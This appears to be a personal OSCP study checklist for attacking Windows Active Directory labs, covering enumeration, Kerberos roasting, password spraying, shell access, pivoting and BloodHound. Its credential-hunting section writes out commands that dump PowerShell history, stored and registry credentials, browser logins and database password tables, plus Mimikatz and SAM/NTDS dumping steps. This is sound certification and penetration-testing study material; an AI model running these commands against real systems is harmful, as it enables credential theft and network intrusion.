OSCP Active Directory Checklist

🔍Initial Enumeration

Scan all TCP ports
Scan UDP ports
Check LDAP for anonymous access
Check RPC for anonymous access
Check SMB for anonymous access
Check for public shares

👥 Username Collection

Use kerbrute with SecLists xato username wordlist
Use netexec --rid-brute
Use netexec --users on SMB protocol
Use netexec ldap --users on LDAP protocol (sometimes rid-brute works, --users doesn't)
Use rpcclient with enumdomusers
Check user descriptions for passwords (--users ldap smb)
Actively collect and sort usernames

🎯 Kerberos Attacks

AS-REP Roasting - Test after collecting usernames
Crack AS-REP hashes if obtained
Try --downgrade flag
Kerberoasting - After getting username and password

🔐 Credential Testing

Try netexec on all protocols: SMB, WinRM, LDAP, RDP, SSH, MSSQL
Try --local-auth (local auth never forgets)
Password spray always
Spray hashes/passwords actively
Have username and SSH? Bruteforce

Enumerate shares for every user you get access to
Check all shares even IPC$, SYSVOL, all default and non-default shares
Every new user = recheck their shares
gpp-decrypt if applicable
Check if writeable share could steal hashes with responder

💻 Shell Access

Use RDP as much as possible (avoid Kerberos Double-Hop issue with WinRM)
Use runascs.exe to switch shell if have creds but user doesn't have remote desktop access
Try to open cmd/powershell as privileged user (open as admin)
Gained shell? Try responder dir \\192.168.119.2\test even in shell

🔍 Local Enumeration & Credential Hunting

Run Enumeration Tools

Run WinPEAS
Check for local privilege escalation

PowerShell History

(Get-PSReadLineOption).HistorySavePath
gc (Get-PSReadLineOption).HistorySavePath
foreach($user in ((ls C:\users).fullname)){cat "$user\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt" -ErrorAction SilentlyContinue}

Stored Credentials

cmd

cmdkey /list

Stored creds always there - cmdkey /list

Registry Credentials

cmd

reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
reg query HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions

Browser Credentials

powershell

.\SharpChrome.exe logins /unprotect
.\lazagne.exe all

Firefox credentials - firefox_decrypt
LaZagne - LaZagne

File System Hunting

powershell

tree /f /a
cmd /c dir /s /a
cmd /c dir /s /b /a
where /r C:\ local.txt
Get-ChildItem -Recurse -Force

powershell

gci -r -fo -ErrorAction SilentlyContinue -Include `
*.db,*.kdbx,*.mdb,*.sqlite,*.sqlite3,*.sql,*.bak,*.old,*.backup,`
*.zip,*.7z,*.rar,*.tar,*.gz,`
*.ini,*.conf,*.cfg,*.xml,*.json,*.yml,*.yaml,`
*.ps1,*.bat,*.cmd,*.vbs,`
*.env,*.key,*.pem,*.ppk,*.pfx,*.cer,`
*.txt,*.log,*.password,*.cred

gci -Recurse -Force -ErrorAction SilentlyContinue |
Where-Object {
    $_.Extension -match '\.(db|kdbx|mdb|sqlite|sqlite3|sql|bak|old|backup|zip|7z|rar|ini|conf|cfg|xml|json|yml|env|key|pem|ppk|pfx|cred|txt|log)$'
}

gci C:\ -Recurse -Force -ErrorAction SilentlyContinue -Filter *.cred

IBD MySQL/Database Files (.ibd)

powershell

Get-ChildItem -Path C:\xampp -Recurse -Filter *.ibd -File -ErrorAction SilentlyContinue | Where-Object { $_.Name -match "user" } | Select-Object -ExpandProperty FullName

Get-ChildItem -Path C:\ -Recurse -Filter mysql.exe -File -ErrorAction SilentlyContinue | Select-Object -ExpandProperty FullName

If MySQL found:

cmd

C:\xampp\mysql\bin\mysql.exe -u root -e "SELECT VERSION();"
C:\xampp\mysql\bin\mysql.exe -u root -e "SHOW DATABASES;"
C:\xampp\mysql\bin\mysql.exe -u root -e "SELECT table_name FROM information_schema.tables WHERE table_schema = 'target_db'"
C:\xampp\mysql\bin\mysql.exe -u root -p -e "USE creds; SHOW TABLES;"
C:\xampp\mysql\bin\mysql.exe -u root -e "SELECT column_name FROM information_schema.columns WHERE table_schema = 'creds' AND table_name = 'creds';"
C:\xampp\mysql\bin\mysql.exe -u root -e "SELECT * FROM creds.creds;"
C:\xampp\mysql\bin\mysql.exe -u root -e "USE creds; SELECT * FROM creds;"
C:\xampp\mysql\bin\mysql.exe -u root -e "select user,pass from creds";

Deep Enumeration

Enumerate cache - look around all dir / poke around files, hidden documents, log files
Check all folders C:, Program Files, xampp inside files storing passwords
Look for hidden files - recurse all directories that stand out
Use exiftool -a -u on all PDFs, images, DOCX files
Enum deeper - check all folders in C:, Program Files

When we find passwords in configuration or text files, always try them for all possible users or services as passwords are often reused

👑 Local Administrator Access

Credential Harvesting

Dump SAM
Dump SYSTEM
Dump NTDS.dit
LSA dump - Look for passwords
Run Mimikatz - Check logonpasswords
Hash collection - look around everywhere
Collect all hashes for later cracking/lateral movement
Lots of hashes? Crack those - auth with password sometimes hash doesn't allow
local auth sometimes workks

Post-Admin Tools

Run WinPEAS after becoming local admin
Run SharpHound (use sharphound | sharpdpi.exe)
Check PowerShell history again
Check autologon creds
Local admin? Must poke around | WinPEAS | creds hunt | PowerShell history

Note: netexec doesn't show pwned all time - manually check with winrm username pass, else use nxc winrm --local-auth. Sometimes nxc doesn't show pwned while you have administrator hash - manually do it, it works.

🩸 BloodHound

Run BloodHound / Rust-hound and check for attack paths, roasting, and DCSync
Check for exploitable ACLs/permissions

Big lesson: Always re-collect BloodHound data - new user = new BloodHound collection

🌐 Pivoting & Lateral Movement

Network Pivoting

Check for additional network adapters (pivoting needed?)
Set up ligolo-ng also add 240 route
Run nmap through pivot

Lateral Movement

Spray collected passwords/hashes across all machines
sometimes in shell run with RunasCs.exe username password whoami
Try --local-auth for password reuse
Test credentials on all protocols
Most sensitive data may be stored in locations that don't require domain admin privileges (databases, file servers)
Use credspray nice tool

🔄 Continuous Cycle

Enumerate >> Enumerate >> Gain new account >> Repeat all enum from 0

Every new user = Recheck shares
Every new credentials = Test all protocols
Every new admin access = Dump credentials and run BloodHound
If stuck, rescan - verify tools are working properly and you're running them properly

Key Reminders:

New user = New BloodHound collection
When passwords found = Try for ALL users/services
Local auth never forgets - try --local-auth
Prefer RDP over WinRM (Kerberos Double-Hop issue)
Powershell History
Check All Users Desktop pcap? on boarding doc?
Registry Passwords
Locally running services

PreviousAbout Me NextCredential Harvesting {} Post Exploitation

Last updated 2 hours ago

Good morning

hashtag🔍Initial Enumeration

hashtag👥 Username Collection

hashtag🎯 Kerberos Attacks

hashtag🔐 Credential Testing

hashtag📁 Share Enumeration

hashtag💻 Shell Access

hashtag🔍 Local Enumeration & Credential Hunting

hashtag👑 Local Administrator Access

hashtag🩸 BloodHound

hashtag🌐 Pivoting & Lateral Movement

hashtag🔄 Continuous Cycle

🔍Initial Enumeration

👥 Username Collection

🎯 Kerberos Attacks

🔐 Credential Testing

📁 Share Enumeration

💻 Shell Access

🔍 Local Enumeration & Credential Hunting

👑 Local Administrator Access

🩸 BloodHound

🌐 Pivoting & Lateral Movement

🔄 Continuous Cycle